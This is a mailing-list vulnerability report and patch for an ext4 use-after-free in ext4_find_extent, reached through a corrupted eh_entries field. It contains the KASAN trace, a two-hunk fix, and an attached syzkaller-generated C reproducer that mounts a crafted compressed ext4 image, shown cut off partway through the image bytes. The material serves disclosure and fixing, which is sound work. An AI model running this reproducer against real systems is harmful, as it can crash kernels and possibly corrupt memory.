[PATCH] ext4: Fix KASAN slab-use-after-free in ext4_find_extent due to corrupted eh_entries

From: 余昊铖
Date: Mon Dec 01 2025 - 10:18:05 EST

Hello,

I would like to report a potential security issue in the Linux kernel ext4 filesystem, which I found using a modified syzkaller-based kernel fuzzing tool that I developed.



Summary

-------

A local unprivileged user who can mount a crafted ext4 filesystem image and execute concurrent file operations (such as sendfile or write) can trigger a KASAN-reported slab-use-after-free in ext4_find_extent().

The bug is triggered by a crafted ext4 image where the eh_entries field of an extent header exceeds the eh_max field. This corruption leads to an out-of-bounds pointer calculation in EXT_LAST_EXTENT, causing the kernel to access freed memory during binary search operations.

I have extracted the crafted ext4 image using python, which can pass the e2fsck checking without any error or warning.

I verified this on Linux kernel version 6.12.51.



Environment

-----------

- Kernel version: 6.12.51 (built with KASAN, PREEMPT, SMP, NOPTI)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
- Filesystem: ext4, mounted from a crafted disk image via /dev/loopN



Symptoms and logs

-----------------

When running the syzkaller reproducer, the kernel crashes with a KASAN slab-use-after-free report.


Relevant part of the KASAN report:

[ 40.783761] BUG: KASAN: slab-use-after-free in ext4_find_extent+0x909/0x9e0
[ 40.784839] Read of size 4 at addr ffff8880030a8e0c by task kworker/u10:2/46
[ 40.785878]
[ 40.786186] CPU: 1 UID: 0 PID: 46 Comm: kworker/u10:2 Not tainted 6.12.51 #4
[ 40.786206] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[ 40.786219] Workqueue: writeback wb_workfn (flush-7:0)
[ 40.786243] Call Trace:
[ 40.786250] <TASK>
[ 40.786257] dump_stack_lvl+0x7d/0xa0
[ 40.786301] print_report+0xcf/0x610
[ 40.786324] ? __virt_addr_valid+0xcb/0x320
[ 40.786348] ? ext4_find_extent+0x909/0x9e0
[ 40.786368] kasan_report+0xb5/0xe0
[ 40.786391] ? ext4_find_extent+0x909/0x9e0
[ 40.786413] ext4_find_extent+0x909/0x9e0
[ 40.786434] ext4_ext_map_blocks+0x13d/0x35b0



Reproducer

----------

The issue is reproducible with a C program generated automatically.

The reproducer performs roughly the following steps:


1. Mounts a crafted ext4 image containing an inode with a corrupted extent header (eh_entries > eh_max).
2. Executes concurrent file operations (like sendfile) that trigger extent lookup on the corrupted inode.


I am attaching the full C program as well as the simplified one for convenience. Also, I have extracted the corrupted file system and attached it as image.img.



Security impact

---------------

This is at least a local denial-of-service issue (kernel crash/panic) reachable by an unprivileged local user who can mount a crafted filesystem image. The out-of-bounds read accesses a freed slab object, which could potentially be exploited for further memory corruption.


Because KASAN reports a slab use-after-free involving task_struct objects, I am not sure whether this can be further exploited for privilege escalation, but in principle it looks like a memory corruption bug.



Patch

--------------

This patch fixes a slab-use-after-free vulnerability in ext4_find_extent()

that occurs when processing a corrupted filesystem image.


When traversing the extent tree, if an extent header's eh_entries field is

corrupted and exceeds eh_max, the EXT_LAST_EXTENT macro calculates a

pointer that points beyond the allocated memory of the extent block. This

leads to an out-of-bounds access in ext4_ext_binsearch_idx() or

ext4_ext_binsearch(), which can access a freed slab object, triggering a

KASAN panic.


The fix enforces a consistency check in ext4_find_extent(). It verifies

that eh_entries does not exceed eh_max before invoking the binary search

functions. If the check fails, it reports an error via EXT4_ERROR_INODE

and returns -EFSCORRUPTED, preventing the invalid memory access.


Signed-off-by: 0ne1r0s <yuhaocheng035@xxxxxxxxx>

---

fs/ext4/extents.c | 11 ++++++++++-

1 file changed, 10 insertions(+), 1 deletion(-)


diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c

index 34e25eee6521..2f420e04b095 100644

--- a/fs/ext4/extents.c

+++ b/fs/ext4/extents.c

@@ -929,7 +929,11 @@ ext4_find_extent(struct inode *inode, ext4_lblk_t block,

while (i) {

ext_debug(inode, "depth %d: num %d, max %d\n",

ppos, le16_to_cpu(eh->eh_entries), le16_to_cpu(eh->eh_max));

-

+ if (unlikely(le16_to_cpu(eh->eh_entries) > le16_to_cpu(eh->eh_max))) {

+ EXT4_ERROR_INODE(inode, "inode has invalid extent entries");

+ ret = -EFSCORRUPTED;

+ goto err;

+ }

ext4_ext_binsearch_idx(inode, path + ppos, block);

path[ppos].p_block = ext4_idx_pblock(path[ppos].p_idx);

path[ppos].p_depth = i;

@@ -951,6 +955,11 @@ ext4_find_extent(struct inode *inode, ext4_lblk_t block,

path[ppos].p_ext = NULL;

path[ppos].p_idx = NULL;


+ if (unlikely(le16_to_cpu(eh->eh_entries) > le16_to_cpu(eh->eh_max))) {

+ EXT4_ERROR_INODE(inode, "inode has invalid extent entries");

+ ret = -EFSCORRUPTED;

+ goto err;

+ }

/* find extent */

ext4_ext_binsearch(inode, path + ppos, block);

/* if not an empty leaf */
--
2.51.0




Request

-------

Could you please confirm if this is a known issue? And if it is considered a new security vulnerability, I would like to request or coordinate a CVE ID for it and will reference the relevant patch / mailing list thread in the CVE description.


Thank you very much for your time and for maintaining ext4.



Best regards,

Haocheng Yu

Zhejiang University

Attachment: image.img
Description: Binary data

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <setjmp.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#include <linux/loop.h>

#ifndef __NR_memfd_create
#define __NR_memfd_create 319
#endif

static unsigned long long procid;

static long syz_create_resource(volatile long val)
{
return val;
}

//% This code is derived from puff.{c,h}, found in the zlib development. The
//% original files come with the following copyright notice:

//% Copyright (C) 2002-2013 Mark Adler, all rights reserved
//% version 2.3, 21 Jan 2013
//% This software is provided 'as-is', without any express or implied
//% warranty. In no event will the author be held liable for any damages
//% arising from the use of this software.
//% Permission is granted to anyone to use this software for any purpose,
//% including commercial applications, and to alter it and redistribute it
//% freely, subject to the following restrictions:
//% 1. The origin of this software must not be misrepresented; you must not
//% claim that you wrote the original software. If you use this software
//% in a product, an acknowledgment in the product documentation would be
//% appreciated but is not required.
//% 2. Altered source versions must be plainly marked as such, and must not be
//% misrepresented as being the original software.
//% 3. This notice may not be removed or altered from any source distribution.
//% Mark Adler madler@xxxxxxxxxxxxxxxxxx

//% BEGIN CODE DERIVED FROM puff.{c,h}

#define MAXBITS 15
#define MAXLCODES 286
#define MAXDCODES 30
#define MAXCODES (MAXLCODES + MAXDCODES)
#define FIXLCODES 288

struct puff_state {
unsigned char* out;
unsigned long outlen;
unsigned long outcnt;
const unsigned char* in;
unsigned long inlen;
unsigned long incnt;
int bitbuf;
int bitcnt;
jmp_buf env;
};
static int puff_bits(struct puff_state* s, int need)
{
long val = s->bitbuf;
while (s->bitcnt < need) {
if (s->incnt == s->inlen)
longjmp(s->env, 1);
val |= (long)(s->in[s->incnt++]) << s->bitcnt;
s->bitcnt += 8;
}
s->bitbuf = (int)(val >> need);
s->bitcnt -= need;
return (int)(val & ((1L << need) - 1));
}
static int puff_stored(struct puff_state* s)
{
s->bitbuf = 0;
s->bitcnt = 0;
if (s->incnt + 4 > s->inlen)
return 2;
unsigned len = s->in[s->incnt++];
len |= s->in[s->incnt++] << 8;
if (s->in[s->incnt++] != (~len & 0xff) ||
s->in[s->incnt++] != ((~len >> 8) & 0xff))
return -2;
if (s->incnt + len > s->inlen)
return 2;
if (s->outcnt + len > s->outlen)
return 1;
for (; len--; s->outcnt++, s->incnt++) {
if (s->in[s->incnt])
s->out[s->outcnt] = s->in[s->incnt];
}
return 0;
}
struct puff_huffman {
short* count;
short* symbol;
};
static int puff_decode(struct puff_state* s, const struct puff_huffman* h)
{
int first = 0;
int index = 0;
int bitbuf = s->bitbuf;
int left = s->bitcnt;
int code = first = index = 0;
int len = 1;
short* next = h->count + 1;
while (1) {
while (left--) {
code |= bitbuf & 1;
bitbuf >>= 1;
int count = *next++;
if (code - count < first) {
s->bitbuf = bitbuf;
s->bitcnt = (s->bitcnt - len) & 7;
return h->symbol[index + (code - first)];
}
index += count;
first += count;
first <<= 1;
code <<= 1;
len++;
}
left = (MAXBITS + 1) - len;
if (left == 0)
break;
if (s->incnt == s->inlen)
longjmp(s->env, 1);
bitbuf = s->in[s->incnt++];
if (left > 8)
left = 8;
}
return -10;
}
static int puff_construct(struct puff_huffman* h, const short* length, int n)
{
int len;
for (len = 0; len <= MAXBITS; len++)
h->count[len] = 0;
int symbol;
for (symbol = 0; symbol < n; symbol++)
(h->count[length[symbol]])++;
if (h->count[0] == n)
return 0;
int left = 1;
for (len = 1; len <= MAXBITS; len++) {
left <<= 1;
left -= h->count[len];
if (left < 0)
return left;
}
short offs[MAXBITS + 1];
offs[1] = 0;
for (len = 1; len < MAXBITS; len++)
offs[len + 1] = offs[len] + h->count[len];
for (symbol = 0; symbol < n; symbol++)
if (length[symbol] != 0)
h->symbol[offs[length[symbol]]++] = symbol;
return left;
}
static int puff_codes(struct puff_state* s, const struct puff_huffman* lencode,
const struct puff_huffman* distcode)
{
static const short lens[29] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 13,
15, 17, 19, 23, 27, 31, 35, 43, 51, 59,
67, 83, 99, 115, 131, 163, 195, 227, 258};
static const short lext[29] = {0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2,
2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0};
static const short dists[30] = {
1, 2, 3, 4, 5, 7, 9, 13, 17, 25,
33, 49, 65, 97, 129, 193, 257, 385, 513, 769,
1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577};
static const short dext[30] = {0, 0, 0, 0, 1, 1, 2, 2, 3, 3,
4, 4, 5, 5, 6, 6, 7, 7, 8, 8,
9, 9, 10, 10, 11, 11, 12, 12, 13, 13};
int symbol;
do {
symbol = puff_decode(s, lencode);
if (symbol < 0)
return symbol;
if (symbol < 256) {
if (s->outcnt == s->outlen)
return 1;
if (symbol)
s->out[s->outcnt] = symbol;
s->outcnt++;
} else if (symbol > 256) {
symbol -= 257;
if (symbol >= 29)
return -10;
int len = lens[symbol] + puff_bits(s, lext[symbol]);
symbol = puff_decode(s, distcode);
if (symbol < 0)
return symbol;
unsigned dist = dists[symbol] + puff_bits(s, dext[symbol]);
if (dist > s->outcnt)
return -11;
if (s->outcnt + len > s->outlen)
return 1;
while (len--) {
if (dist <= s->outcnt && s->out[s->outcnt - dist])
s->out[s->outcnt] = s->out[s->outcnt - dist];
s->outcnt++;
}
}
} while (symbol != 256);
return 0;
}
static int puff_fixed(struct puff_state* s)
{
static int virgin = 1;
static short lencnt[MAXBITS + 1], lensym[FIXLCODES];
static short distcnt[MAXBITS + 1], distsym[MAXDCODES];
static struct puff_huffman lencode, distcode;
if (virgin) {
lencode.count = lencnt;
lencode.symbol = lensym;
distcode.count = distcnt;
distcode.symbol = distsym;
short lengths[FIXLCODES];
int symbol;
for (symbol = 0; symbol < 144; symbol++)
lengths[symbol] = 8;
for (; symbol < 256; symbol++)
lengths[symbol] = 9;
for (; symbol < 280; symbol++)
lengths[symbol] = 7;
for (; symbol < FIXLCODES; symbol++)
lengths[symbol] = 8;
puff_construct(&lencode, lengths, FIXLCODES);
for (symbol = 0; symbol < MAXDCODES; symbol++)
lengths[symbol] = 5;
puff_construct(&distcode, lengths, MAXDCODES);
virgin = 0;
}
return puff_codes(s, &lencode, &distcode);
}
static int puff_dynamic(struct puff_state* s)
{
static const short order[19] = {16, 17, 18, 0, 8, 7, 9, 6, 10, 5,
11, 4, 12, 3, 13, 2, 14, 1, 15};
int nlen = puff_bits(s, 5) + 257;
int ndist = puff_bits(s, 5) + 1;
int ncode = puff_bits(s, 4) + 4;
if (nlen > MAXLCODES || ndist > MAXDCODES)
return -3;
short lengths[MAXCODES];
int index;
for (index = 0; index < ncode; index++)
lengths[order[index]] = puff_bits(s, 3);
for (; index < 19; index++)
lengths[order[index]] = 0;
short lencnt[MAXBITS + 1], lensym[MAXLCODES];
struct puff_huffman lencode = {lencnt, lensym};
int err = puff_construct(&lencode, lengths, 19);
if (err != 0)
return -4;
index = 0;
while (index < nlen + ndist) {
int symbol;
int len;
symbol = puff_decode(s, &lencode);
if (symbol < 0)
return symbol;
if (symbol < 16)
lengths[index++] = symbol;
else {
len = 0;
if (symbol == 16) {
if (index == 0)
return -5;
len = lengths[index - 1];
symbol = 3 + puff_bits(s, 2);
} else if (symbol == 17)
symbol = 3 + puff_bits(s, 3);
else
symbol = 11 + puff_bits(s, 7);
if (index + symbol > nlen + ndist)
return -6;
while (symbol--)
lengths[index++] = len;
}
}
if (lengths[256] == 0)
return -9;
err = puff_construct(&lencode, lengths, nlen);
if (err && (err < 0 || nlen != lencode.count[0] + lencode.count[1]))
return -7;
short distcnt[MAXBITS + 1], distsym[MAXDCODES];
struct puff_huffman distcode = {distcnt, distsym};
err = puff_construct(&distcode, lengths + nlen, ndist);
if (err && (err < 0 || ndist != distcode.count[0] + distcode.count[1]))
return -8;
return puff_codes(s, &lencode, &distcode);
}
static int puff(unsigned char* dest, unsigned long* destlen,
const unsigned char* source, unsigned long sourcelen)
{
struct puff_state s = {
.out = dest,
.outlen = *destlen,
.outcnt = 0,
.in = source,
.inlen = sourcelen,
.incnt = 0,
.bitbuf = 0,
.bitcnt = 0,
};
int err;
if (setjmp(s.env) != 0)
err = 2;
else {
int last;
do {
last = puff_bits(&s, 1);
int type = puff_bits(&s, 2);
err = type == 0 ? puff_stored(&s)
: (type == 1 ? puff_fixed(&s)
: (type == 2 ? puff_dynamic(&s) : -1));
if (err != 0)
break;
} while (!last);
}
*destlen = s.outcnt;
return err;
}

//% END CODE DERIVED FROM puff.{c,h}

#define ZLIB_HEADER_WIDTH 2

static int puff_zlib_to_file(const unsigned char* source,
unsigned long sourcelen, int dest_fd)
{
if (sourcelen < ZLIB_HEADER_WIDTH)
return 0;
source += ZLIB_HEADER_WIDTH;
sourcelen -= ZLIB_HEADER_WIDTH;
const unsigned long max_destlen = 132 << 20;
void* ret = mmap(0, max_destlen, PROT_WRITE | PROT_READ,
MAP_PRIVATE | MAP_ANON, -1, 0);
if (ret == MAP_FAILED)
return -1;
unsigned char* dest = (unsigned char*)ret;
unsigned long destlen = max_destlen;
int err = puff(dest, &destlen, source, sourcelen);
if (err) {
munmap(dest, max_destlen);
errno = -err;
return -1;
}
if (write(dest_fd, dest, destlen) != (ssize_t)destlen) {
munmap(dest, max_destlen);
return -1;
}
return munmap(dest, max_destlen);
}

static int setup_loop_device(unsigned char* data, unsigned long size,
const char* loopname, int* loopfd_p)
{
int err = 0, loopfd = -1;
int memfd = syscall(__NR_memfd_create, "syzkaller", 0);
if (memfd == -1) {
err = errno;
goto error;
}
if (puff_zlib_to_file(data, size, memfd)) {
err = errno;
goto error_close_memfd;
}
loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
err = errno;
goto error_close_memfd;
}
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
if (errno != EBUSY) {
err = errno;
goto error_close_loop;
}
ioctl(loopfd, LOOP_CLR_FD, 0);
usleep(1000);
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
err = errno;
goto error_close_loop;
}
}
close(memfd);
*loopfd_p = loopfd;
return 0;

error_close_loop:
close(loopfd);
error_close_memfd:
close(memfd);
error:
errno = err;
return -1;
}

static void reset_loop_device(const char* loopname)
{
int loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
return;
}
if (ioctl(loopfd, LOOP_CLR_FD, 0)) {
}
close(loopfd);
}

static long syz_mount_image(volatile long fsarg, volatile long dir,
volatile long flags, volatile long optsarg,
volatile long change_dir,
volatile unsigned long size, volatile long image)
{
unsigned char* data = (unsigned char*)image;
int res = -1, err = 0, need_loop_device = !!size;
char* mount_opts = (char*)optsarg;
char* target = (char*)dir;
char* fs = (char*)fsarg;
char* source = NULL;
char loopname[64];
if (need_loop_device) {
int loopfd;
memset(loopname, 0, sizeof(loopname));
snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
if (setup_loop_device(data, size, loopname, &loopfd) == -1)
return -1;
close(loopfd);
source = loopname;
}
mkdir(target, 0777);
char opts[256];
memset(opts, 0, sizeof(opts));
if (strlen(mount_opts) > (sizeof(opts) - 32)) {
}
strncpy(opts, mount_opts, sizeof(opts) - 32);
if (strcmp(fs, "iso9660") == 0) {
flags |= MS_RDONLY;
} else if (strncmp(fs, "ext", 3) == 0) {
bool has_remount_ro = false;
char* remount_ro_start = strstr(opts, "errors=remount-ro");
if (remount_ro_start != NULL) {
char after = *(remount_ro_start + strlen("errors=remount-ro"));
char before = remount_ro_start == opts ? '\0' : *(remount_ro_start - 1);
has_remount_ro = ((before == '\0' || before == ',') &&
(after == '\0' || after == ','));
}
if (strstr(opts, "errors=panic") || !has_remount_ro)
strcat(opts, ",errors=continue");
} else if (strcmp(fs, "xfs") == 0) {
strcat(opts, ",nouuid");
} else if (strncmp(fs, "gfs2", 4) == 0 &&
(strstr(opts, "errors=panic") || strstr(opts, "debug"))) {
strcat(opts, ",errors=withdraw");
}
res = mount(source, target, fs, flags, opts);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
res = open(target, O_RDONLY | O_DIRECTORY);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
if (change_dir) {
res = chdir(target);
if (res == -1) {
err = errno;
}
}

error_clear_loop:
if (need_loop_device)
reset_loop_device(loopname);
errno = err;
return res;
}

uint64_t r[4] = {0x0, 0xffffffffffffffff, 0x0, 0xffffffffffffffff};

int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// syz_mount_image$ext4 arguments: [
// fs: ptr[in, buffer] {
// buffer: {65 78 74 34 00} (length 0x5)
// }
// dir: ptr[in, buffer] {
// buffer: {2e 2f 66 69 6c 65 30 00} (length 0x8)
// }
// flags: mount_flags = 0x0 (8 bytes)
// opts: ptr[in, fs_options[ext4_options]] {
// fs_options[ext4_options] {
// elems: array[fs_opt_elem[ext4_options]] {
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// inode_readahead_blks: fs_opt["inode_readahead_blks", fmt[hex,
// flags[ext4_inode_readahead_blks]]] {
// name: buffer: {69 6e 6f 64 65 5f 72 65 61 64 61 68 65 61 64
// 5f 62 6c 6b 73} (length 0x14) eq: const = 0x3d (1 bytes)
// val: ext4_inode_readahead_blks = 0x200000 (18 bytes)
// }
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// usrjquota: buffer: {75 73 72 6a 71 75 6f 74 61 3d} (length
// 0xa)
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// nojournal_checksum: buffer: {6e 6f 6a 6f 75 72 6e 61 6c 5f 63
// 68 65 63 6b 73 75 6d} (length 0x12)
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// stripe: fs_opt["stripe", fmt[hex, int32]] {
// name: buffer: {73 74 72 69 70 65} (length 0x6)
// eq: const = 0x3d (1 bytes)
// val: int32 = 0x24 (18 bytes)
// }
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// usrquota: buffer: {75 73 72 71 75 6f 74 61} (length 0x8)
// }
// comma: const = 0x2c (1 bytes)
// }
// fs_opt_elem[ext4_options] {
// elem: union ext4_options {
// mb_optimize_scan: fs_opt["mb_optimize_scan", fmt[hex,
// int32[0:1]]] {
// name: buffer: {6d 62 5f 6f 70 74 69 6d 69 7a 65 5f 73 63 61
// 6e} (length 0x10) eq: const = 0x3d (1 bytes) val: int32 =
// 0x1 (18 bytes)
// }
// }
// comma: const = 0x2c (1 bytes)
// }
// }
// common: array[fs_opt_elem[fs_options_common]] {
// }
// null: const = 0x0 (1 bytes)
// }
// }
// chdir: int8 = 0x1 (1 bytes)
// size: len = 0x46f (8 bytes)
// img: ptr[in, buffer] {
// buffer: (compressed buffer with length 0x46f)
// }
// ]
// returns fd_dir
memcpy((void*)0x200000000b80, "ext4\000", 5);
memcpy((void*)0x200000000000, "./file0\000", 8);
memcpy((void*)0x200000000ac0, "inode_readahead_blks", 20);
*(uint8_t*)0x200000000ad4 = 0x3d;
sprintf((char*)0x200000000ad5, "0x%016llx", (long long)0x200000);
*(uint8_t*)0x200000000ae7 = 0x2c;
memcpy((void*)0x200000000ae8, "usrjquota=", 10);
*(uint8_t*)0x200000000af2 = 0x2c;
memcpy((void*)0x200000000af3, "nojournal_checksum", 18);
*(uint8_t*)0x200000000b05 = 0x2c;
memcpy((void*)0x200000000b06, "stripe", 6);
*(uint8_t*)0x200000000b0c = 0x3d;
sprintf((char*)0x200000000b0d, "0x%016llx", (long long)0x24);
*(uint8_t*)0x200000000b1f = 0x2c;
memcpy((void*)0x200000000b20, "usrquota", 8);
*(uint8_t*)0x200000000b28 = 0x2c;
memcpy((void*)0x200000000b29, "mb_optimize_scan", 16);
*(uint8_t*)0x200000000b39 = 0x3d;
sprintf((char*)0x200000000b3a, "0x%016llx", (long long)1);
*(uint8_t*)0x200000000b4c = 0x2c;
*(uint8_t*)0x200000000b4d = 0;
memcpy(
(void*)0x200000000540,
"\x78\x9c\xec\xdd\xbf\x6f\x5b\x55\x1b\x00\xe0\xf7\x3a\x3f\xbf\x34\x6d\xf2"
"\x41\x07\x84\x54\x11\x41\x25\x10\x55\xed\x38\x96\x2a\x65\x6b\x61\x60\xa1"
"\x08\xa9\x88\x81\x0e\x69\xd4\xba\x4e\x14\x3b\x8e\x62\x47\x6a\x32\xb5\x30"
"\xb2\xb2\x30\xb6\x0b\x5b\xda\x0d\x31\x20\xa1\x0e\x1d\x61\xe5\x6f\x40\xaa"
"\x40\x02\x26\x06\x23\xdb\xd7\xa9\x9b\xc4\x24\x85\xa4\x96\xe2\xe7\x91\x8e"
"\x7d\xce\x3d\x8e\xcf\xbd\x7e\xef\xbd\xe7\xea\x1d\x72\x02\x18\x58\x33\x11"
"\x71\x37\x22\x46\x23\xe2\x46\x44\x4c\xa5\xdb\x93\xb4\xc4\xe5\x76\x69\x7e"
"\x6e\xbb\xf0\x68\xa9\x59\x92\x68\x34\xae\xfd\x9a\xb4\xfa\x1f\x14\x1e\x2d"
"\x45\xd7\xdf\x34\x9d\x6a\xbe\x64\x22\x5e\x8b\x88\xc7\x1f\x24\x71\xe1\xee"
"\xde\x71\x6b\x9b\x5b\x2b\x8b\xe5\x72\x71\x3d\x6d\xe7\xea\x95\xb5\x5c\x6d"
"\x73\xeb\xe2\x72\x65\xb1\x54\x2c\x15\x57\xf3\xf9\x4b\xf3\x85\xc2\x6c\x7e"
"\x6e\xfe\xc8\x8e\x75\xe1\xf3\x27\x7f\x9e\x7b\xf8\xfe\x93\x2f\xce\xe7\xbe"
"\x8d\x2f\xbf\x7b\x2f\x89\xcb\x31\x99\xf6\x75\x1f\xc7\x51\x99\x89\x99\xf4"
"\x37\x19\x89\xd3\x5d\xdb\x87\x23\xe2\xda\x51\x0f\xd6\x67\x93\x5d\xf5\x64"
"\xb8\x8f\x3b\xc2\x0b\xc9\x44\xc4\x2b\x11\xf1\x66\xeb\xfa\x9f\x8a\xa1\x10"
"\x3c\x00\x38\xe9\x1a\x8d\xa9\x68\x4c\x75\xb7\x01\x80\x93\x2e\xd3\xca\xdd"
"\x24\x99\x6c\x9a\x0b\x98\x8c\x4c\x26\x9b\x6d\xe7\xf0\xce\xc6\x44\xa6\x5c"
"\xad\xd5\x2f\xdc\xae\x6e\xac\xde\x6a\xe7\x78\xa6\x63\x24\x73\x7b\xb9\x5c"
"\x9c\x4d\x73\x85\xd3\x31\x92\x34\xdb\xf9\x56\xfd\x59\x7b\x6e\x57\xbb\x10"
"\x11\xff\x8f\x88\xaf\xc6\xfe\xd7\x6a\x67\x6f\x56\xcb\xb7\xfa\xf9\xe0\x03"
"\x00\x03\xec\xd4\xae\xf9\xff\x8f\xb1\xf6\xfc\x0f\x00\x9c\x70\xe3\xfd\xde"
"\x01\x00\xe0\xa5\x33\xff\x03\xc0\xe0\x31\xff\x03\xc0\xe0\x31\xff\x03\xc0"
"\xe0\x31\xff\x03\xc0\xe0\x31\xff\x03\xc0\xe0\x31\xff\x03\x00\x00\xc0\x89"
"\xf6\xf1\xd5\xab\xcd\xd2\xd8\x4e\xd7\xbf\x58\xad\x96\x96\x57\x96\xd6\xe6"
"\xe7\x66\xb3\x95\x8d\x9b\xd9\x9b\xd5\xf5\xb5\x6c\xa9\x5a\x2d\xb5\xfe\x63"
"\x5f\xe5\xe0\xef\x2b\x57\xab\x6b\xf9\xb9\xd8\xb8\x93\xab\x17\x6b\xf5\x5c"
"\x6d\x73\x6b\xa1\x52\xdd\x58\xad\x2f\xb4\xd6\xf5\x58\x28\x8e\xbc\x84\x63"
"\x02\x00\xfe\xd9\xce\x3a\x5c\x2a\x2a\x2a\x2a\x3b\x95\x7e\xdf\x99\x80\xe3"
"\xf6\xec\xa2\xef\xf7\x9e\x00\x00\x00\x00\x00\x00\x47\xa5\xd1\x48\xac\xf9"
"\x0f\x00\x03\x66\xb2\xc7\xfa\xff\xa7\xbb\xd6\xee\x9f\x8d\x88\x33\x11\xf1"
"\xf3\xd8\xc8\x58\x67\xad\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x18\x04\x0f\x0a\x8f\x96\x3a\xa5\xdf\xfb\xc2\xcb\xf3\xf4\x4a\x44\x8c\xb7"
"\xe3\xbf\x9d\x96\x76\xcf\x70\x0c\xb7\xde\xc7\x63\x24\x22\x26\x7e\x4f\xd2"
"\x76\x5b\x12\x11\x43\x47\x30\xfe\x4c\x44\xfc\xf6\xa0\xf2\x7d\xb3\x44\x7a"
"\x1e\x1e\xc1\xd7\x02\x00\xd0\xc3\xdd\x7b\x11\x71\x63\x7a\x66\xef\xf3\xff"
"\xf3\xcf\x7b\xff\xc6\xe4\x21\x3e\x33\xb3\xab\xed\xf9\x0f\x00\x8e\xdf\x0f"
"\x57\x22\xe2\xf2\x7e\xf9\xbf\x4c\x3a\x37\x8f\xb7\x5e\x77\xe7\x7f\xc6\x5b"
"\x19\xa2\xff\xce\xfc\xdf\x5f\x9d\xfc\xdf\xf6\x9e\xfc\x5f\x66\x27\xff\x37"
"\xd4\x23\xff\xf7\xea\x21\xc7\xb8\xfe\xd1\xfd\x4f\x7b\xf5\x75\xe7\xff\x9a"
"\xa5\x39\x7e\x27\x17\xc8\xf1\x7b\x7a\x2f\xe2\xf5\xe1\xfd\xe2\x9f\xec\xc4"
"\x3f\xe9\x11\xff\x33\x87\x1c\xe3\xeb\x73\xdf\xd4\x7a\xf5\x89\x7f\x7f\x35"
"\xee\x47\xbc\x1d\xfb\xc7\xbf\xa3\x59\xcb\xd5\x2b\x6b\xb9\xda\xe6\xd6\xc5"
"\xe5\xca\x62\xa9\x58\x2a\xae\xe6\xf3\x97\xe6\x0b\x85\xd9\xfc\xdc\x7c\xee"
"\xf6\x72\xb9\x38\xdb\x7e\xdd\x77\x8c\x3b\x3f\xfd\xf5\xa4\xd7\xf8\xe2\xdf"
"\x5f\xcd\xeb\x7f\xa2\x47\xfc\x0f\xba\xff\x4f\x1d\x72\x8c\xd1\xb5\xc7\x2b"
"\xbd\xfa\x0e\x8e\x7f\xe6\x97\xd1\xe4\x93\xd6\xc9\x38\x9a\x6e\xb9\xb3\x58"
"\xaf\xaf\xe7\x23\x46\x93\x0f\xf7\x6e\x9f\x7b\x91\xa3\x1f\x3c\x9d\xdf\xa8"
"\xf3\x1b\x36\xe3\xff\xce\x5b\xfb\xcf\xff\x67\x5b\xef\x9d\xfb\xff\xd0\x73"
"\xf1\xcf\x44\xc4\x74\xfa\x9e\x49\xe3\x38\x9c\x9e\x17\xef\xee\x1a\xf3\x8d"
"\xeb\x0f\x7f\xec\xb5\x3f\xae\xff\xfe\x6a\xc6\xff\xd6\x01\xd7\x7f\xaf\xf9"
"\xff\xc2\x21\xc7\x38\x9f\x9b\xf8\xac\x57\x9f\xf8\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\xc0\x8b\xab\x6d\x6e\xad\x2c\x96\xcb\xc5\xf5\x63\xac\xf4\xfb"
"\x18\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
